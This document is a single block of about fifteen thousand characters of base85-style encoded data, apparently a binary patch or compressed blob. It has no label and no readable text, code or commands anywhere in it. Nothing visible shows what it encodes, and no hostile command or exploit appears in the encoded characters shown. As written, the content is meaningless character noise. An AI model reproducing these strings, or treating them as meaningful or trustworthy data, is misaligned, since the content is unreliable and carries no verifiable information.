zjD1j#_I4hlJ~b(RYO(s%7Wt{k3T0af?OHKiWaB^`An!Tv*ebL4NA3=0@4jl>9Uj{q z-P;{UeV$bOJZ<&)P2}gd*`MbdKffFMytMcEJ!)@Nac|9P?_=cNX7=88G>^#ZdXL`KPasdT@c_P&y z>Q+9zL;n8Tw0h;}2>_GU-!727bQKdt1>qE&4htfHRvX2i>j~^<0IaIoNC~yj4 zN{81eYj>d$^~*c;jbB;6d_6b5uXhs_UCAP&&tYH$>!LwbXwXYGtR#gUTcz*Uy;wcz z-%N4Pq`Oda($1C-%7FcwuhNg!<*(+IP-|a~1XU(8<*x)9tMz+1d!?VT7dE#Ipr&Yq z8Niv!0Yl`V^v?YtD;=G=v%_`@rqB(uMYDU-Sab0|bJ+ijxy|Z{X1Ap+2}a9ouKXmO zJE~y+rhfstS*a;I$@3M>zO8zYd;Iv zcbnY?_CMX;8_Z1yNrp%Fy?#G={3qbf@25BOm<)C~@D)>cMDCx%yvg}HpYvCw>hF^G z-^DL~m)QTU-ub&`{qOyI%%=Ch?Z^MN#xbA2{1XHnPb(dNz3^}6=JDp8o#xHgWs(`*M3VoKbr`o%7&F4SfHm-1MbL%?Kp88M7{YUshTg3Z; z3iqFp%g?VL!$mxfqCW8WN{d)ZMtHV9tT=ahd7<31cQC_y@V4jgOM6StZz4{4{fR&P zDC&N$JfSmW>+@1?q1AKct6#r=em{7}`}oGczkiPr`{#Z!+dppIF1x1G4P864sqq|4 zQ8r+buAv*SDD^2DviS?r=-_+))_BZ2|A}rkYl4aqw{t*~5wADJwi$)^P3y#5NNDWa z5y@;aIdv1NN)%0%Xdapm;%XQ`M+ev)D++I}O%i4A)ij%(e%z-z4CJy}yn@&Y`XQM^ zqXr5BT<(*>g5i}9b+*gGKbiJ)%rsk_`O>Fmt^ad<`n2xx;o)e9A5pB(!9r!a)IZx+ 
z4338-=WA?O?6%mMEA^|}TWZzrTfYPwO*|6y^O58yuxZ3)n2u$NrVy?3W0kFSYTKOL zFZ63Tdve|?RI*uB^P@`SnWkg})KrqdvN5h2rN*Nw9~_UQmZF`*9`|dyM?6_-ef#`I za!#UyRO$MBv!6{*rNalB!$O-MOu;O2v-XMCwJ-fo?60svE;q(fiAEV3Cxw~vf__`c z=?>H=HHVN@wvl%U(sdnv8A=0u$7*RWcit+*nOPd8OV$$m`JIF=UDgS$8tDiu_D<0W zD*d}yjB6@TLr=9$;8W)uWTMPH6!P#oAC=f^;(}_6gStZQU0ynBq|X@K3vSPg-q@Uq zmooQ|YxbGgx-_aIpI&yy_)J9G+o0cr^*YOmp%35gh=t|i_3nkn66?eS&^bK6x0=Tz zpGNhvo9IRVUj7lf)A}ttqfx+a)z3$BRCjZQVt;@2Ld8;Hqq1iKRot`R+C=~28|SxK z(G^0{EQdp~xD*z9fkM<0omPcikjz3=C{GnmBwt+1F*$qXIP7gB|6FS(Cb%Z5RJcsv8a!GpCdq zuszKF)@8`@Y>LZWbMUc_oB!Re)?}d*oKF)^r586s{?rlo zUrRC3lyD2xDRinNtrr;~5GebuU=Wh$&lF8GRQ1xa40UQrZps{zx4w%pI7F37F4me} zJu)1P66Nkfesraon%->cmq*SR$u;O$U!Ap2n4?fNKlWJ42|@S|wSyF+xvUCX4^$}< zJ?uZ~$26PNtc-fs*r_<;HK&k&`O_*g{k*hsJc36vI2vP!Mq zy(QP{>zYZU{Pmrw)9SxJtX^ibJ~A?Zn8M?Nr)aa1YqZLX z!k#70G-(>MxL1Z*M6b^(e6tCya41x|V2oB&FJh6MXR_g)nrk+$!DJ~DCB#HaOlTQW z4wdzn6o0!?Tx_MQY7Km~k{4#$i##4zKzYRu&@su991Z&Nf%yxi!^Q>z-o4eL`YdjX zKVTH>vt9A{CiDg>nuGQnrQ8N_sEy>l;%WJLbQaPPAyrtNqA}#1W<-%FUn|-2*%bNd zQg3L*sp}OOXHCl@;@pxAH<7jFTj;evf9xSJql!+ltj#vP1PY# z#1KOSXiH{0|3r;l8vtp77A={d^s&@UMn9QY+`-@)kkSO8Y+d>tXXR>@! 
zWPd9BZZncQg%!e^%Q6H&R4)4_>8FIS_Q!kw8R~x^`sZix;T2(T(YqPi<%R`UAYMYD zuXzooL|GZQxN7c-3=iy8{$ZM-2CE$sa)Q4r;=}p(PWe+Dy1_+}08>{hOvR&Ts)$aI zd1gDmYSV*(AE_hcY}x+4j$vUrQU}o3RCCExkGMH9SpNF987&M{xPe1F0L>_4kGrRY z=oCRGHa^R{@v5==J#>&V%bk+xail+{o9%^ z$ZMf4?pJ5qifVado`3RspXosy`hGt{pGk?21QD8RbCLNQ?uuAadb2koRIa~^j1yc; z{HD3ke|;wgGC(6ZKdBK;iijV+mj4Z|Ax=3f)CH*o!B*56_R{;07m#_!>OUm2p5U^t z@G-YOl8hvvjT(#(JsHV?E!o`A{<6 zT16(YYKfg0x(L}*;Jf491&XZPU%sg3VJPUc_-QX=N?|n4a?}^0xC!vFR>w9tuQmJf zX+8LfPI#>D_c2sCiC=Z~`{+m&c>6^c-03+?7i$1INyI}tRNTu(M5b>>-#j|e5%#B6 z-|PfwO>UjJv8J=^^8DGS>=$7G6sgyJM!2V!pUxrPC;m|X7ugATG!Z5*s!Dz34@W;m?bc^vz13zr)TPze_@zVksYQC3bJ= zn;+@#8FnpT&+eXi0sLY9IISVo$|ca+$~i=_TuIr^(16lk7^5NZ6_U9)C}ibqMKDxb zMi;1u9!_WKbU0Cn7nXFJ$yaE!-gOD6yz!)D%!oS z51;oKBIT7COY6= zeg@?13b_A+N_wct#VX*JfmF0C=d-IUzhfjs7QmKy#(hyKirCc8c!XZFg!cShMVi!$ z{j;NT5+{s1k29c7HRJ^<#Wa|5HJrIm+gOV@u<9}pv^y9a-cy@opl^yY_0hM8)s^=+ ztAjM*9;v%k1-&uSrU$$pUm1G4^Bf*b`tR4BG-uz}pN+6KAP>BJA z=Vyi}0gU7TVtW-K@fI$bRzMAdv1UG_1UDStSuNGlK}2_J+b76yeq+(+tT^k>hH0{> zPZy3wt2@18iJ2!w`%{dz%#!FY&FXt0NRkp4RJk7RCdj7iLSoe>BZr{$xk1Hx62RAv z(k5%}rzBep!%0cT!JxU!QS?yKT8&JM4wzk=%!*AijR#IxmH-jdD50T(qp+f_Y|Kga zG^?bJ2GxC%UqAh7ZFU&QWmWX=^n;QfQ?- zihv9)ND7jH{Kray+Pv0-J{T5*L4-A79iZA8`p^F~2uLg7s0Yv{6KHS^2c#}QW}O%f z4Nf@{YDd!{7xue&?^2FA=Ei+FDJ-;<_inGURFTfp))6dZbq7P;N~k7we0AMYqXEnr zWvfhsuOzesC*5Ncrg9xnrFfE3Ybz8-Mof^xT&NcUUf4~K>SD=k!->XGP_&FSfCRwx zlOYd#5i$^QZh&J*Jw2xF^ZGcta;nw=x$_O+g~3dx6Nev+eG(#taAt7O$5>sobY-Bt z`eZ>Lct|BhIG)5h(awqn*e0N}i@k~zOY>W!3p3Q~2_&00?VLCeS4m=MB}7eVf=E(U zHnM?zOl%B)$qLv5HUNeXVc9|*IB_2%9k{o~bcN3i*^hg`$ikA75TaoPbjCOsj=!#H zz} zP-`TqG_I$4^?ve=gRJ1MdD#y{jm{$Lf9>eKz}@dVxdlX3{yZAFjHgLr!BfvzrU{mB zo|Uc#kA9tQf5-yW+HX*(H;KuGBIb<#jTo;}Oxh?AjiH5yEl}|Oli*!b^J{=s!Rr}0 z%I!>Dj$}=+4?JDY5Jd+Z%poq<+|9K?$-z*)A-BdB3hD?l$YEn13j-rPf=`opOkE%i6^jqefeU;lS@f3{LmnOab{$$(eNd z>r+&R0)_E>;v)$?WFi+uX}acy3MQds+~s7*Pp-F{f2G_hgVNdTb&ehyS5nkwdXh?@ zTAA;46WW6_pwYJ$?cY7GTXHu?Qtss2BGD+(lEKutTXySQ%gkWare?$D>q9y86w7q z#M%zk2Ogzv_1GH%i_`6{oYc?4zQGSEgKNH@+9WiB 
z@jdWDy&OI`4NMT7FGwGlZf%`eT%CW|ZO#I!m`S|4X!1ANz4-K*tdn2TE&JlrBqN(~ zW72x@X+Q@JQ9+VeXWN;S1B3d`x4pGv?KiVa ziPzRYYSzk_@;!ZcZ5g?*FfFX*H3phz&Jb%10EjlZ=%nM#PaF1?%gXfCSwoU5ipAgS zeNh-G(tmT#68b2?ASrnErwUR)Zp$)eR zGD+!Km%4>j$lZX;A}e8yc=L_`=1)Vze_zh}Lv{9F%tSm#1J>7q^do+gd|RMwb5qo< zGq#O*3}F2wc0nMVWaxs7`Oo)lOKZ`OGqx)=Z(%!crzwo51BKb60#MimbcW51PAFSa z;$Bc>%Xxy{2AtNLPz1FSX@4R~ioCV`Q1j_iy|oO}wbJkmDwf5}kEVQZ7Yif_kRFOO zSDeSQjM(#ytz$?2WK?{oY0ymfVsa|=jr`pp$M(SiPKFCar-i1jU|W$uhx}Fg#QLc* z4Rais1MOIR7G@K)b+2&THw<9a{^)S2)6;N>!A53f%$k3qq-uLa*pqCn`aDvSUO9r| zG$NoK3OMZ6eA_GCh?Kl6eMa>Gq{n8gMMcNy%*8k_`OumLUPoIc(XHjqPJ!!RmCTXpo3CQn!COoGQG)o{>3(u)UFm|ZVzn00auG(wzp5-rpjoS(|%}7apS)|bTQz`%`!u<&yOR2pD{~nO!2ZL}cNc>jw`LPV%-RQEI zGhqGqLv1Bd^;^u#3=;8~Jm=7JaLEq=_apmH&=|}QUrv%9!LK6%62Ba7UP4zGN-m$( zUurhHriSFTF9g58$Ovx;O898+4_y#TQd`_k_;Kk1>Le^4LQ%eA;}6fmT`=E*8Zak$ zAv6-+f;W@22&QAva}C$p4B3|Fif9*KeuX+VT@<_%m^JYO9-MUeudUwM{LE3jCjIhD zt|SB6RzMiUAe3^<+umy3PHpzWSscYamJ_TR&Y91SiRo2>lvKwadcqZ`Wri*0*+EKywS+B)asM>MgI);2-Wf#G<%l)hUA;umZ+BLlZ zD<4~`+_4o`tgI9XUM*(ynh&0KGGo*PF3#m9!9%97L9Yz%y-sEkSojks69lm~&TpS! 
z@@E(fqB1HqLtB#+Nw;!DxK%^$Ckg3<_A++)@K%eRdhc*=s%z2j;np;}Z#~6^(8r;d zH6vCA1ch}a%?ciEL}c)&l-%6kC;4-iu3v$$YFXK7wR^Q9FJa{HuQ6SWcthXE!HYtPP@&fE_gwH59Tjn7NaN{_BBOCX2^S!CedK=;#l_#5cG9PSNGgJQQDnuk^2 zHMEQy2tI0^wsVhY{W{|Rh#<-qfW|MQxEedazM6^#t2}Wi-7RcDAKJ7gFa22Ut1jmS z4nscQY|QqF?)U`em=V#!;AkSed@oW??|>=fLJ6?b3A88X=`=$(vpz_e0KHXMoZj?hp)PKs)fzhB{82W^d~YI%%OA z_zRd4O9;@vGR^V#JCQ|XF)C3w7tLI8E$5F!+T>quCU5%)iGGqL8>Q#2VNO6nu3^>$ z=vFuy(_A_{HKMi4b1IA;F$E|;@v#u{q1|(P)gLEnm*QW#L&$24GMK#-+yvv0!f5J9 zPH>#D8xxR0%a(2D?UJ+`uJK@)?K+xA;16XSju+<)3nCBtn|jQ1&0foz%Uj>vWC z>vL>OCY$^17!1BR)S!s|zoe)3f0Eua6>qrC+wQSrm~tpN+Ld9K*!`=2P*vbi$aKPp za2roiy&cA6=7Oas7OG^0vr32`l=wt7KgBkF!N?9Xt(9<)pdKr1z192xPBb;e2C11r zrv8fh%Hz`nVrP$Mu&LURQC%=a?wz6J$kOWj++R$waY#u4(Q{1cAYB1kuQy3GwFx#H zUXf2^wbjlwrLD5C%Ro+|n?T)S1j{vFX26OmMJ)jDa+7m}@*(Z6FGr(5kwKbSo*i;d zyHPB5P6Q#Ji~R6W@^V*QIl4%;>{GXk-xk5JihI8`hO8Hz8gv8yzadhXk@*1vSMOOBm_{Nk^XNqEh zPx*_QWyq!pVvCXkA^lGftJ~^?2n&1n?!#<5nRSh) zr(cnPTF<&!fz(OC(k|v=I$kH&JOLLe1c6R7Y5GKVjp0!-LWdn2F3!DNABigheQ;A5 z-)3BzplmkB^(>n^z8$n>Q}tuN*i^x3^;>Sak=a2t#FgP!BkmZp2@rc+;CYL~RPl!c z1Il!Z$MXUcDP}KFCX=l;8q3w^lto2t-fEUnu?S6Q&}o8@iVqm!Q>H3ld-c?m z2J<*MdR5TdP2}K1Hmj0_GqbmhOxSoTty+D;^^}pHbJiV;0@0jW&Kr$st7#T9Ele?! 
z=|?~EM^-lnlk!IiGTqo0=n{a|Y3uid#=A8VCC-M$UAL0zxzhxFIfXS!?R;`q%1KAu>-g>R^WgI};dE{)O#sujBQ?vwwEf)Xk3mYui3 zpJ>lK`lHHc?`od8X4rguxsEC>L}plP`LLT?P3+Yx+lqeu`OJ~|bK}MS0I#2}>7Bxw zO&Jlp{^Dom$J)dQ3AYARUkr=6(TF^GK9q$2!a5hM<~obmmU90Xb;v{#D?C=W+JO4^k9xBhXc3pVZ@eD;%xj;Yr8{A?(7)g3vs0HJyoQoZ{ z95uJbcurW-O2z6TjtLPqk_ZT2C5Z3D_Y0LkC|!g?GWbf%x8=|4owFP-U01s=hl(Sz zT;0wjQKyO77A>l7XR?jy;R1L(i$qYZe^-v}c2t^SORSD4w1vu@t=W_luw6Xg_5;@# zIw->ZRXqE9!%e$S?&k(IyMk_KCR9|;{t#||y{!M`+Lzz&A;;-Y-#E1(4&PC^*Rw*1 z@Gv`aX8bD|eotz5++@?|Pq9xsNeO#x^hfj^rzbhaE(U0>H|ZvFZ?VSIo)+fD-#nWG z%NCF9GJNMV5e}7(Y!6uB&<-cS0&fp;nXpXc+2uD1AX>yR*b2HKnSe43wx%P5&>tPb zO{M_-;ML<)zCNMY;PMrixk>c&kNQ{HBi%?D1VF*@7j&br9=)D@Lk*yR+un8CtQnKH zj8@9SaVWEn?%Zf{W*-a(Dt9Yi$ox;p2s+8BUYHqAHf0^!;uDsi_sWlOobIeB_}e#9 zn{5k25R^R<``P6G5(G#j0RRW%cERMa%BR_Y1HjhQ#IJl@qI|fcD7Wo-ey17!9Mj&M z+RWwB%tl{hda@Z`%=|m#Z4LfWXhL^thXD)mgG3j2ABq@Hg9oy4**hd^&7@kE;~?1p z%Vb(+fQ3K-NTAvNsNUFzL6M{~PV6G`?F?Q5m`>@N!jCJM5i&hZ0?6Y5SFGm0A16zq zagZ*s$_pp%nC?%V>A$m1W`nqqH?V%@Dnn*m_?uemg_E^}XFIN`1HYuSLPX zAF=((2uW=N7QWZ%N2ly*IQvOFWj`7DEDz6N8WcXzP~V>+Uk=S1>HXdhxU3upj2q+o z6xMtAWgtrzeUg)xx#6kE9bYE1UZL`7Qzb8;xh)kB*5N>J!puHo9nhH73WF#Xg^_bb7aj3K9I*uGug0OsUi+w9j_7Z2FAgbI%{Q( z`wVraPd@|m7vL=@?9MkVB-Ixb^f?um*DcZ=D=xJUI^XZdmekm8UXu#wnYK2M3r?7#0)} z(*d_ROO#;!>NsFzOa-xMF#bc|mGq%eTl$DqV6Z#Zeh@AbU;R(iEBO*-exbUszSGRKfc2b*p4aMyFNTqy85rcTNvzq2If>r4gok?g z8Rwhv6bM*?X38Y6;ZtUk`@I$#zg5l{6op}Fdgb>~+ z83jrCGmh{zrY)j$`3E=7X4U)Ey(mI)I>dX+|{VBu$O_{rQ>)#TI3pix(Yt4D*+%J3W;A8z0t z8`2WfzDIPr8RW<^+ZhZp@xf(nz=F6z)x9t^V@2?KTG&Mfzl?B2W6=w@g{zv$sQ*4O zWK{1WPS$&fnD6D#_}f4 zYj_`|hBb(*rXVNKMtYKGqg{FQE?7_)Kmo&gfgm035T)IOO~Q+cZ)~zX#GK~|Pbm7N z4|WHK@+Z|4^Moc&%!BKZh;oM1E)Gx*H0k*gBm^+kkD%%cz~MdG+6GKEswG$$-woF+ z>JX3op+Cd!)TQGbOtU?l%0N^-xH%ycM71#q!11qxLWn*MWl~q<7(sEQ({msZ8#fE; zW;LdSAIV^@FMs{bVZ92cd7-6NR1PS?ixA#eMNpsCOlUS15?w37h&`272iPKC^F<6i3WZ zZ^1>i5|yJy&E>eZo|I=81oS~~D#uRVMOw4yHYgv~W}FM^QzPwODor|<0_`h@oHfY9 z(IC1F@|;iPQG>fE@q7rTL_m|I@c!+wY^s2m(;vyNArBnQmG*-h?+OWFCNWaPZgN{?#%x9vGJy9 
zT%YqNRsw}=k?Y~-BqSB~&Am*D$2d;<{A(T|`}JssbC`k26kgmx&F>OmgN?LE&@jm+ z(pETUuJpUt{2=`~TzZrmAhqzHP^@6&MI#C9Jb1P--6fwFVBy}~sw`h|M^6B%Gt_IS&JvR5w(4piIh5n{-rbl>1W`X?9l-e4 z4L7T#oTlF=1WPe#G9clXs~^eM(4CC~u!bw$&UXnwrO-{RrT%8Vk%d8Kv18;+e2?r8 zCX$)lc_H}|%Bq|wN$9m$$KJ)=A#1u~GzV^6IW^NJ@v+a9BNqc%W%l0|o#_reelb_h zD%2IrT)`XRHd@=?)LwbLgnNXi?mWt}Q4HE0>6?rsL;kwad^l@j3m#hB`ux`gAsDiu zFzAbvsK7fI5Oo^(l})*1{Ihc~zK6Xt#oEdfB=avCqt%KuK>oK6)1b zyE$(WrQU-{`2Gsn?o>grra&dBy5!ZP$Kp!XT%@L(ZIW2h;Rstn%QPEyXiqQE*iXj{ z&Cq!E1yXrc#SOfm?*AxaI0S44jSG2A9`PoXAr-0^FdxRP}G^rXB$VA)PDDWYIf)Og7*(^<$hccGUAAS$f@+ zAaT7|=Nbn~j8y$#Y1C|tLrL+Pd;`M77*L3Nx_3J0!yjdm>>wfiO7GaFJ#;&T`I{h< zGUUGoUE>;uwJn{*D_Hr!b%IDXzeRVbg?rr?yT~^XIT- z<+kLdQ6^|Zw#14&Q>FzG`eG}XtaLW#X}=|3Cgal`Tu_gl;RHxf2-xIeJX<$X6T+`Y z7$M`qI~9sy_4eCR$-E3>VD>5vcZq5F15qBiz7}RYeAT-|agkbX8dYOrpV(sf&nYS( zWS19rB8i%zxRV_E9ME&5$sz@~phoBh-p2?iB4p-Yq8YU-R3U)9c!^lF~G#Y0b zOQA`Dj81j13Y1?JdlzAJC1t+5 zN-Py9e9)O7voX~JkE|BCPL%wBssyt+h6efgiY1*gj0thQnBh+5WPT8_o*(i$ELUtv znA}40N`)(dB7BNN1BZ)M&d)w8jXghp2cOELUltcKeb4ru)AO>6VbfnXI_q{OJR)MZ z#^z_AzZ=pKyWiT7=DX$*8LR21ol%fJ6uCKGWl|jZG(O@j-O{?OPbDpDdm}ydTruIT zgaW&%aK*PwWY@yL%QNE<{{yW+QokdKc7ygmYtNEp3x2i#2KAb1t*HduLN9}u;etQ_ zxp=IqNw&y^j5H?XBnyKaw9Fw00W^pdGI04Ln5izi5Hn!NIO7ac_UdS-7O6Opqe*1s zsUtY>_(Ml`W?RdpM@S4!y94>-=^+RE>j)PRaiK~^7<1`@!Y*(jF-gp}>qxssAoTH| z4GmhOi!rU5D5;DG+@Q-MMtSmzpJEDZk?an-Cl197~l*YuU z$YPY1NZF1INXTIGm8$eS=#g9w(!vy}a7p72Hi0=PP(2^gtHDA!G7(J795iK9Dky1& z#iLwe&{81Pnq*YVNPOg$Mo0PYkzoDfXeTd8A*H|nTe_$-4L?lfLQ!7-(^A4U$ViV? zsy^g{j5{!_O3@7|;iywG{s1J@JUbGT%|Db`3r09G+#=Zh4#LF`G62C9SB~~N)=T^5 z#6?}pS~{;*K~W{qRr|R30}?=HX;M(Cw9vxEB(qdjwvRy$S>%yPF4^RhQBL_}>_n!` zHr(PfCl27WP$Guv%!xq>#8Qa^zLz7sFECF(Ozi|rsJVhQkUGa~5s zj!VMFVmZ?;*vHm#FhKP*H1MFY0p@~3_4e#YkNf0?IVqccbr9CM`L+U@#<*D#l@yF4BRliR z|J3Ms^=c$l@N*@-Jg##Ys|+Y1IZG!c&XpOG*DmWD|qwQ1FuR6!=@P=(eXsdbf>0Vyn}*;vb6lWy9St4o5}y7yJf zN^2qKSp9=ep}KOOr8VtoQJY%TF0^G^&ExawlsGUyuT8n#cN7vH?b1_%h?vPvSC? 
zq$_G7V+o@y+;5wnMOB4y1xXogQmf?Ul0h{5Ma z)Zx``naf@F@|WEST-V$awmY=VKI1?HJ~$&8U8n&C3TjZ^VpO3$EShN?gpB40QE5ah z&Ju#q(A%KH2+qa-Xl;mqjOn7rx>yuT*tWY&^xc<{vCfc1ZL)7|!3wy4^G%z7tf^)4?(ebNOCN!!izF>bn8KRH>4WoW)2!IUvsUD`_@m+yXWEhj=3gOWEWSyft;Tw}v8i%gdcwq z71vF1Si72B5Yf;UkC}MDQ)oiqR?@k^Eo``FhUYGSaO@o2IWgHt;?OhL8wQa>Q%S;)v=y+nB%-PIv@Ji zg?5gNuLg)#gDBW{cn+&Afe1<0I>?&-b`VZo?j;;?-SM7xz3-jxeFqKKS>tuI4<0%` z|LvVuql-A0y@-UD4-?~{3%C2-G;yc=$>@IhY2RJ*o%j6bK_7b60)90Ycl_xuF7}_d zCK+icw46`hTqC3*8KSqn-ZOvuTykFbz4!g^fggO%kX|*WM?LBdzZ&9)#O*?yWD>>~Ej@-S`7AIs93%;*1~-b1=M0KzfK4_4PU*&M{hX!HE*I+Q^9&oL! zhX*O}2Z1mMg|IUQkTj^~XEHGDIFJK9u+9$e1r0*+5-JIK3ukg8^1NqcT2N(n(6nSw z{@QAumglazaN)|3$a?UVhHwqpunmK-2zSpx$iZq(a0%@Y`V6qQjH5TsrvghT7vdlW zQjZG5&Y)r-4tgO6)i5&zXQkXwgc4A-`l{-zN`ubu5iv0nHF59Y5P2MA9_Y{t?~n=q z^Dymd!w5nUH9FBVw15cWU=Z=}YCz65(u`JIkgTYy5%+2nHz*QQYZ9rh5;N!$d9fIc z@fc-p6$@z#fCv_YW)wRR`Tk4^#_nTWC=Qn3?4}SJW05+RCJu6821COI=jf6^<`x|e z9lfxcR8HL{kQk9M9_4W!xl9>zi3+698wv68xUm~i&^WMg^+LuxbRh|j%O87=Jn{`> zDsdrE!+vg|<`T%{Ceq7pQ0pR+0Tq!RIkF=?vb5|G7Y)K0-~bzqpz-=~7EAFt3T+AE zV9lzL1rLG+lOGu#w%AgD`z!%-A5$GTTGN2Nq(%+&kA~HY?3Lq2I%QWZ!5xg=Jyg@q_AOl1o zEZglP?eZ@15+qY`H5{acbU_KCz&KL!1Xof%qCg3B!4#Y!CdVvGQlTJwW6pAe9Fhwj z526Ajzz{A#jzXysK)?(P0R^=3G=PKwBp?t1VH1=R<{V)G1R)SYfi6)?bl^Y&)SwUg zAOx^sD&ar{`rrg)(=u195o*&cMc~*-qbYH-61-u4Ff#;Xa|QEqI;pcdGbkjt4?97l z&9G4$p@_K*Dl(1E2wbuYYEL$_12d0O8dw5Rut*Uy(-7()Ei6TLT*agRsGxB8!dR3o zMqULGB)|;JfDf<%NRs6~%HX$Bhc;Kn#3yJ~d;**aEO5=t}ITUg&@hD&PP}z#IBYPK>F?vS?cb=c%^m z!xCjG^g;{};Q$Um55i&+u2cdtvl4uYjWou2oXS)>OAHtwM!}*gFmnRlQc5>W9j)_F z5j9aiLp!aHQ9Z-9*ux<4usYyF?cReji9i>q4?QPAJp;iG5+j`dF60Q}(@A$xdQ1V} z#O-z9s1fks0_=bbJak*|V?niKr(%RfH=~>;6qq!tLr%%^G?YUlL318-TZD&1wou zsUE0#=pYRGKngk&H}>tcOpRGc90(4N3qEinUq-OKh&~K;~r& z_|#9|G*G=kUxiYn6m?@cwquEKFDKAZJp)bGfCwmH36{VHY``X|<|I`XWhsCNjA1du za5d61GtD3Y!lEPSz!6kH4Pw+(!K4|qg{WL2unzP=oWT_TCLuw2^g(2#Sbk?=D$GIB zLnzZDP{_1is+3_JG<7UVZ+L0c^ouHnH4xAueN1F-9AthBDDG9f*0B5-9yrNm39 zdR9hFHI(oJ-u6TZSlWO_rbZ%6ASSKQ`7TqMaPvfFuB|uOK 
z>_9xG4?T8xiT6-NHu#Qr)l31mh(HOFAPMF{9?)TW(Lo;O;dzzdH;{qNM&@Q?G!Q6* zBbrhTfL1=!LIzvl2v*<$$e?UpB1Fz$5}Kg|cHja3M!`OufejvDfA53}(B&6Agbgsk z7eGu4Y{DS$V1FN=N~(4(T3`nRz!gHJ83b5sMfE7sUp-Mst5xhV^ML>~x!6l-E3|7e@ z9(a8rK|odsiI3n2T!AG{Wny<1P{ z4FbW5gT)aDp#UZTF&yEP4FL~S05oG%5N<#k_ToyvpbuoUol&3+)IbozH&fn*5(?n} z*jYfuSpeAcA(}D}Vl<=!fuj-S5;F4w4xoGmlmO(wG0=5G10f9#KtKyR0g}>E=->z% zTBAiEEGBu4{#iiDAOmPRMhPG)4T2^Aa+;Q*GfP_ya+aWAg40_uPwv;0h0yQyVHJ3TO#d{u~x%bL@ z_o7)Wrx`P2bgHodMhXE53?T&nwz(Sm1FvzjsK3_@41y9WV6XFAoZp!e8~~gJ6g6?P z0P4UXu#}(KlMcKfMsYKw^*RtxK$q#D1nPC3^_qO$*;f(RHZ!`N4LTAYq6*@ZuJu|F z1OQPgJ4T^fMh$_V>y5j;AP@wBeDyn>nc+-K0B3zW5D37efclipK*tICd%59gx!}ir zTR{6(FP=KUIh(5ATCW9k0;&N>NHv@rdao~_SRbLXwK=2fpc+gQG&h`})xb9y8mu)S zsheB^z8c5Bx^KfJp4VKz4|~U&K~5Q4suLha!XUEE04yjQ2?7DL8DOs|T){p22Sp>VkHv}*thb!PV3*Z_cWN%S31TujN*1!V-)Y2!qL$1^}k1|%-00hXl07M}o zFjEjtzz?WE5j0*6Lf{$J@%l6i00qhcwAcJ|!-)0XHMy8h{}h zw1eDHeGeu}ApuIyN4X6Oc4?Ga8xDYA;Hzxq$Ct(4W-43vR2kJEt8vYT& z0P4*^1Fm5WHbnRXA=aq?KyjP^5`hw2KSrYxOTRh;_8>w?^`4`Wy5nNlx4>d=mgDup z@~s)#;XnTWqa9==klM%V!LEHH^Mjg003hC&F+;!`6)KGyNswS@oQghmypfs&f}sd( zT(*#MB%wfoJ&~GKFk~iyv`3FLhS@-}lC(%%C>1i)r$C*9lqwXMz=eyL1!fF|aFYcg zr2}dLC7QHlhlD^Oq)9tS2dEjP2eTgJLZ^h9J|V7giA0G~88tQ&E~s!K6HZDQk|sLH z0Leg*RDl|*;&v!AY?AiUXu(VC!vF<7hpD`#HP={I+v;RJh)|x zm=OsikjQt9h_S;!V0a@2WoA^8Ur%)vP)T#N(Nx?)zInji2|Z0R-$-WMpdf696mSSt zhzt}+Ccx45&;-}`wnGI8wDD3SbUdKk0KhFckV}(LvBe|{JT(^;8VZttH`!4lk|2U4 z=*R*Y6gSl*&16tOAfZU(<6hqMSAhf*c;j0M9g(14LSq)t24--^Dd(JY)@kRRc;>0+ zo_zM{=bwNED(Iku7Ha6Bh$gD&qKr1`=%bJdI?p_jR%)rElU}MRpuUY6f;SZ)5y+eW zRM0U(Y-M=!&~C_K$&2F2Q{<91Ds@)g%;jsRcv8gM92swSuGe_ zL~(Lvh6ug(7e;D=V7FZX5df#vnB4Y9E*1JlP)$!gnlR7+)eKxPN*IqRh#M|~bxl^y zQ4xl*{E7Tj0dDlW#lSqp3+zpQMOa58Ol>jpPH1G6Y_MD)0_?>oiD{%5myk3;et=np z-@?9SWw3`-6%D4nVD{%*gac3&#zPTpQK}dZ6>ua@i1Y!LH?Q6IFjrgmaWsGbTZ{?g z!a|a=1uu_ufmYTGS7GakLK0~t9bhX*D%7|<@W3#p6onxvz)^AplwI1}pqZ1%4Xq*_ z!5WDeDH3!UDVR0A>FKDauKMb%x9c~TZpisv1WgJn#k7(x_NXlCM8hlS)_cU-FL+-q+PlAD|m9zy=+X%vkV2coP 
zMq;K#a1}s_eO94m;W!nK;L<_~J17GP-UBar2?;PH!WWzZ109t)!V6I13j;b*fFnTf zc?2Yt!o0>X!CY=XkND4zsxd*2JP!pZIKm3vv$2ka1!Th`85JfnvOtvoDH8famUzY| zGt9`0X8w}lLBt1>2!-GXNK7ID6X7E>L?mebse;;=79_1S0}my5Kp8wRlBto1FIJlb z*0jd8Fn!HzZ_5fD=x_kHU89Nkq0rXUZ~~-JL2lQW2>-5_MFAoueSq=XUH~_wA}NJ% zX0r^28ZpDIG^Z&3>!Sx8KshhL=5oC&6L1`10$pL^a|bd5#Txk+)9vn*s7$3QSINp& zy7HBq2j4X|t#CmkJ8{NztVRXjBt#Ma(+dhsj>#=~EsSak z#7tnCDUJT1Bn)1d7zvS(Of#5mAZ80hCA4x+4|<|kzM&ckq)`_rA+!&%iH(E^_o9z& zC5ARR2n~(poBdEBC%WoV4`cQ+Algib^xH{KepS$e8dN!z5Q7vi$Dc`52qNCl3}$e2 z1B{a7rUIoJUrZXIg_f#qUHh5}43W?Gd5Vb%%+E0MBQzLo5(EPoNNm)ww}j~QZ#^|+ zBGx!n{KP48ia<(OZ)!hF+6r@;>&b%5MuO^jgc(yY7%m4(*uon2u!v2pVpVy|#k#Vw zj@^?kt06fkT|gQh0G20)i8ips<^TsEfM`Vv+GjEIdcAu8Ca^TX6i0rKf7vA8UAq~G zZ)UC|auDZ1G{h})a$#p7NXB$9#1s$lQUWRhZE}=zB$?eafzZ;Y7n&KSEuf@X6syZ% z2mspdhIRsO$x1^>!W#YfMm^5*hIRu1TGEb|0GZ&Z8)0a&kRI@65%5rMP=YI6c_R`l z)yfZRX3gCwYcbU^L?A}n-OKZB=w8lU@EYj%2}_; zHv-YM>QmmBRjrv#fnELBBQzA&4QC*1>O1Qo(>gdhOx0m<8pRMLK-Qorw-0qyDqhJH zVxLIjMb#)oMb!4HpUC}|Z#YX1B>9-)tM2hF5R|bW^ z6T~GaU0(Lwd!<+_3^YS|`9p~XM3ADu5&=y3=NrFJbAy2Kpa#M@B%kiURs-Fhc!jhD 